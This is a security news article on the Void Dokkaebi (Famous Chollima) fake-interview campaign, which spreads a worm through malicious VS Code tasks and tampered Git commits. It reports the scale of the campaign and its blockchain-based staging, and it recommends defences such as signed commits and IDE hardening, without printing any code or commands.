Void Dokkaebi Supply Chain Worm Targets Developers via Fake Interviews

The landscape of state-sponsored cyber warfare shifted significantly on April 21, 2026, as security researchers at Trend Micro unveiled a startling evolution in the tactics of Void Dokkaebi (also known as Famous Chollima or UNC2970). What began years ago as a series of targeted social engineering campaigns aimed at cryptocurrency developers has metamorphosed into a sophisticated Void Dokkaebi supply chain worm. This new threat doesn’t just steal credentials; it weaponizes the victim’s own development environment, turning infected machines into automated vectors for a global supply chain infection.

For years, North Korea-aligned threat actors have utilized “Job Interview” lures to gain initial access to high-value targets in the AI and Web3 sectors. However, the discovery of a self-propagating worm marks a paradigm shift. According to the latest intelligence, the group has moved beyond manual intrusion. They are now deploying a recursive malware framework that identifies, compromises, and exploits the very codebases that developers work on daily, ensuring that the Void Dokkaebi supply chain worm spreads through trusted channels like GitHub, GitLab, and private enterprise repositories.

The Anatomy of a Technical Recruitment Trap

The infection chain typically begins with a highly polished social engineering lure. Under the guise of recruiters from prominent AI or cryptocurrency firms—often using front companies like BlockNovas or SoftGlide—the attackers approach developers on platforms such as LinkedIn and Upwork. These interactions are increasingly sophisticated, often involving AI-powered deepfakes during video interviews. Attackers use real-time facial filters to impersonate legitimate personas, masking their true identities while conducting technical assessments.

The “trap” is sprung during the technical portion of the interview. The candidate is asked to clone a “test project” from a repository to perform a coding task or fix a bug. Hidden within these repositories is the initial payload. In previous iterations, this was a simple infostealer known as BeaverTail. In the 2026 campaign, however, the cloned repository contains the logic for the Void Dokkaebi supply chain worm, designed to achieve persistent, automated lateral movement through the developer’s local machine and their associated remote codebases.

Weaponizing the IDE: VS Code Task Exploitation

The core of this infection resides in the abuse of the Visual Studio Code (VS Code) ecosystem. Attackers have identified that developers often grant “Workspace Trust” to the projects they are actively working on. By injecting malicious configurations into the .vscode/tasks.json file, the Void Dokkaebi supply chain worm ensures its code executes automatically whenever a developer performs common actions, such as building the project or running a test suite.

Trend Micro’s research identified over 500 malicious VS Code task configurations as of early 2026. These tasks are typically configured as downloaders or launchers. Once the IDE environment is compromised, the malware executes a series of scripts—often obfuscated JavaScript or Python—that download secondary RATs (Remote Access Trojans) such as InvisibleFerret or GolangGhost. These tools provide the attackers with full remote control, credential harvesting capabilities, and the ability to exfiltrate sensitive cryptocurrency wallet data.

How the Void Dokkaebi Supply Chain Worm Propagates

What differentiates this campaign from a standard backdoor is its “worm-like” behavior. Once the Void Dokkaebi supply chain worm gains a foothold on a developer’s machine, it scans the local filesystem for other Git repositories. The malware then actively weaponizes these local projects. This is achieved through two primary mechanisms:

• Malicious Task Injection: The worm automatically injects its malicious .vscode/tasks.json configuration into every folder that appears to be a development project. This ensures that any colleague or open-source contributor who clones these projects in the future will also be targeted.
• Commit Tampering and Automated Pushing: The most dangerous component discovered is a tool identified as temp_auto_push.bat. This utility is designed to tamper with the victim’s Git history. It injects malicious code into legitimate source files and then uses the developer’s own local credentials (SSH keys or personal access tokens) to “force-push” these changes to the upstream repository.

By leveraging the victim’s identity, the Void Dokkaebi supply chain worm bypasses standard security reviews. A commit coming from a trusted senior engineer is far less likely to be scrutinized than an external PR. Researchers identified that repositories belonging to major organizations, including DataStax and the Neutralinojs project, were temporarily compromised by these automated bursts of malicious commits. In the case of Neutralinojs, which boasts over 8,400 stars, the attackers utilized automated scripts to push malicious code to all four of the project’s main repositories in a single burst on March 2, 2026.

Blockchain Infrastructure: A Resilient Command-and-Control

The Void Dokkaebi supply chain worm has also evolved its infrastructure to be virtually immune to traditional domain takedowns. Instead of relying solely on hardcoded IP addresses or domain names that can be seized by the FBI (as was the case with the BlockNovas domain in 2025), the group has moved its payload staging to decentralized blockchain infrastructure.

The campaign utilizes the Tron, Aptos, and Binance Smart Chain (BSC) networks to stage its malicious payloads. By embedding encrypted download URLs or configuration data within blockchain transactions or smart contract metadata, the attackers create a highly resilient Command-and-Control (C2) channel. Because these blockchains are decentralized and immutable, defenders cannot “shut down” the source of the malware without the cooperation of the entire network—a feat that is technically and politically impossible.

Furthermore, the group continues to utilize a backbone of Russian IP address ranges, specifically centered in the cities of Khasan and Khabarovsk. These ranges are often cloaked by extensive anonymization networks, including commercial VPNs and RDP (Remote Desktop Protocol) sessions. By routing their traffic through regions with established ties to North Korea, the Void Dokkaebi operators maintain a layer of plausible deniability while benefiting from infrastructure that is outside the reach of Western law enforcement.

Scale of the Infection: By the Numbers

The scale of the Void Dokkaebi supply chain worm campaign is unprecedented for a North Korea-aligned APT. The March 2026 analysis revealed staggering metrics:

1. 750+ Infected Repositories: Ranging from small personal projects to significant enterprise codebases.
2. 500+ Malicious VS Code Tasks: Specifically engineered to execute downloaders the moment a workspace is opened.
3. 100+ Instances of the Commit Tampering Tool: Found actively monitoring developer systems to hijack Git workflows.
4. 80+ Browser Extensions Targeted: Including cryptocurrency wallets (MetaMask, Phantom, TronLink) and password managers (1Password, NordPass).

The Strategic Objective: Finance and Espionage

While the Void Dokkaebi supply chain worm is a technical marvel, its purpose is fundamentally geopolitical. As a subgroup of the Lazarus Group (also tracked as APT38 or BlueNoroff), Void Dokkaebi serves as a primary revenue generator for the North Korean regime. The theft of cryptocurrency serves to bypass international sanctions and fund the nation’s weapons programs.

However, the shift toward a supply chain worm suggests a dual motivation. By infiltrating organizational codebases, the group gains access to intellectual property, signing keys, and CI/CD pipelines. This provides a platform for long-term espionage and the potential for large-scale destructive attacks. A single developer at a major fintech firm, if compromised by this worm, could inadvertently introduce a backdoor into a product used by millions of customers globally.

Defending Against the Developer-Centric Worm

Traditional endpoint protection is often insufficient against the Void Dokkaebi supply chain worm because it operates within the context of trusted development tools. To mitigate this threat, organizations must adopt a more granular approach to developer security:

• IDE Hardening: Disable automatic task execution in VS Code and other IDEs. Implement policies that require manual approval for all workspace tasks, even in “trusted” projects.
• Commit Integrity: Enforce Signed Commits using GPG or SSH keys. If a developer’s machine is compromised, the worm may be able to push code, but it will lack the secret key required to sign the commit, making the anomaly immediately visible in the Git history.
• Branch Protection: Implement strict branch protection rules that require multi-person review for all merges. Automated pushes should be restricted to specific service accounts with limited scopes.
• Credential Hygiene: Use hardware security modules (HSMs) or hardware tokens for Git authentication and cryptocurrency wallet access. If credentials are stored in local configuration files or the system keychain, they are trivial targets for BeaverTail or InvisibleFerret.
• Network Egress Monitoring: Monitor for connections to known blockchain APIs (Tron, Aptos) from development machines that do not have a legitimate business reason to interact with those networks.

The Future of Supply Chain Threats

The emergence of the Void Dokkaebi supply chain worm signifies that the era of “targeted phishing” is evolving into the era of “automated ecosystem compromise.” By targeting the people who build the world’s software, Famous Chollima has found a way to scale its operations exponentially. The worm does the work that used to require dozens of human operators, turning every infected developer into an unwilling recruitment agent for the next victim.

As we move deeper into 2026, the integration of AI-driven social engineering and self-propagating malware will only accelerate. The security of the global software supply chain no longer depends solely on the strength of the server-side code; it depends on the security of the individual developer’s workstation. Void Dokkaebi has proven that in the modern threat landscape, a single “fake interview” can be the patient zero for a global epidemic.